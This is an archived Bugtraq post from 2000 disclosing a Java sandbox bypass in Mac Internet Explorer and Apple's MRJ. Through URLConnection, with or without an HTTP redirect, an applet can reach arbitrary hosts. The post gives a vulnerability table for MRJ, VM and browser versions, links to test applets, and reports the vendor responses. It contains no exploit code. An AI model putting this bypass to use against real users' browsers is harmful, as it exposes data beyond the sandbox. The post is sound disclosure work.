Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Reappearance of an old IE security bug

From: takagi () ETL GO JP (TAKAGI, Hiromitsu)
Date: Sat, 13 May 2000 08:38:06 +0900

On Sun, 16 Apr 2000 17:09:04 -0600
Ben Mesander <bam () DIMENSIONAL COM> wrote:

I have found a way to have a Java applet open a connection to an arbitrary
host and violate the Java security model in Internet Explorer 5. This is a
bug I first discovered in 1997, and Microsoft fixed it then. It seems to
have reappeared in the latest IE 5.
http://www.hungry.com/~ben/msie_bug/


I have confirmed this on the following combinations;
    Mac OS + MRJ 2.2 + IE 5
    Mac OS + Microsoft VM + IE 4.5
and that the followings are not vulnerable.
    Mac OS + MRJ 2.1.4 + IE 5
    Mac OS + MRJ 2.1.4 + IE 4.5
    Mac OS + MRJ 2.2 + IE 4.5

You mentioned that it is a getImage bug. But I suspected that it might
be a java.net.URLConnection bug because getImage seems to be implemented
with URLConnection. I confirmed this with the following applet.
http://java-house.etl.go.jp/~takagi/java/test/urlconnection-http-redirect/Test.html
The result shows that the followings are vulnerable.
 Vulnerable:
    Mac OS + MRJ 2.2 + IE 5
    Mac OS + Microsoft VM + IE 4.5
    Mac OS + MRJ 2.1.4 + IE 5
    Mac OS + MRJ 2.1.4 + IE 4.5
 Not vulnerable:
    Mac OS + MRJ 2.2 + IE 4.5
(I don't understand why URLConnection is more widely vulnerable than
getImage.)

The problem has become very serious because URLConnection can access to
any type of data not only image.

In addition to above, I accidentally found that URLConnection is still
vulnerable without http-redirection technique.
http://java-house.etl.go.jp/~takagi/java/test/urlconnection-direct/Test.html
 Vulnerable:
    Mac OS + MRJ 2.2 + IE 5
    Mac OS + MRJ 2.1.4 + IE 5
    Mac OS + MRJ 2.1.4 + IE 4.5
 Not vulnerable:
    Mac OS + Microsoft VM + IE 4.5
    Mac OS + MRJ 2.2 + IE 4.5
This simple bug seems to be the root of the problem of MRJ (except
Microsoft VM).

I asked the members of "Java House" (a mailing list for discussion about
Java in Japanese I preside) to confirm these vulnerabilities in various
combinations of version of MRJ and Java-enabled browsers. The following
table is the summary of the investigation.

(1) http://neurosis.hungry.com/~ben/msie_bug/
(2) http://java-house.etl.go.jp/~takagi/java/test/urlconnection-http-redirect/Test.html
(3) http://java-house.etl.go.jp/~takagi/java/test/urlconnection-direct/Test.html
                                         (1)   (2)   (3)
MacOS + MRJ 2.2 + IE 5                    V     V     V
MacOS + MRJ 2.2 + IE 4.5                  NV    NV    NV
MacOS + MRJ 2.2 + IE 4.01                 NV    NV    NV
MacOS + MRJ 2.2 + iCab pre2.0             NV    NV    NV
MacOS + MRJ 2.2 + HotJava 3.0             NV    NV    NV
MacOS + MRJ 2.2 + Apple Applet Runner     NV    NV    NV
MacOS + MRJ 2.1.4 + IE 5                  NV    V     V
MacOS + MRJ 2.1.4 + IE 4.5                NV    V     V
MacOS + MRJ 2.1.4 + iCab pre2.0           NV    V     V
MacOS + MRJ 2.1.4 + HotJava 3.0           NV    NV    NV
MacOS + MRJ 2.1.4 + Apple Applet Runner   NV    V     V
MacOS + MRJ 2.1.1 + IE 5                  NV    V     V
MacOS + MRJ 2.1.1 + IE 4.5                NV    V     V
MacOS + MRJ 2.1.1 + IE 4.01               NV    V     V
MacOS + MRJ 2.1.1 + iCab pre2.0           NV    V     V
MacOS + MRJ 2.1.1 + HotJava 3.0           NV    NV    NV
MacOS + MRJ 2.1.1 + Apple Applet Runner   NV    V     V
MacOS + MRJ 2.0 + IE 4.5                  NV    V     V
MacOS + MRJ 2.0 + Apple Applet Runner     NV    V     V
MacOS + Microsoft VM for Java + IE 4.5    V     V     NV
MacOS + Microsoft VM for Java + IE 4.01   V     V     NV
(V: Vulnerable, NV: Not vulnerable)

I submitted this result to Microsoft and Apple Computer last week.

The response from Microsoft Security Response Center was:
| > > I've checked with the IE team, but it turns out that we no longer
| > > support Mac IE; instead, we have collaborated with Apple on their Java
| > > runtime and recommend that customers use it instead of Mac IE.
| > > There's some information on this available at
| > > http://www.microsoft.com/MAC/IE/Newsroom/IE45Press/2.asp, but I've also
| > > asked our product support folks to put together a Knowledge Base article
| > > that makes the recommendation explicit.  Regards,
| >
| > Does it mean that you will not announce it at the Security Bulletin?
|
| Yes, that is correct.  While there won't be a bulletin, the knowledge
| base article will be available for anyone that is concerned with this
| subject.

I worry that people who doesn't know about existence of this problem
could not find their knowledge base article.

Apple Computer seems not to have a response center dedicated for
security issue, so I contacted an engineer of MRJ and reported it.
He said that the problems has been submitted their internal bug
database.

Regards,

--
Hiromitsu Takagi
http://www.etl.go.jp/~takagi/
Previous By Date Next
Previous By Thread Next

Current thread: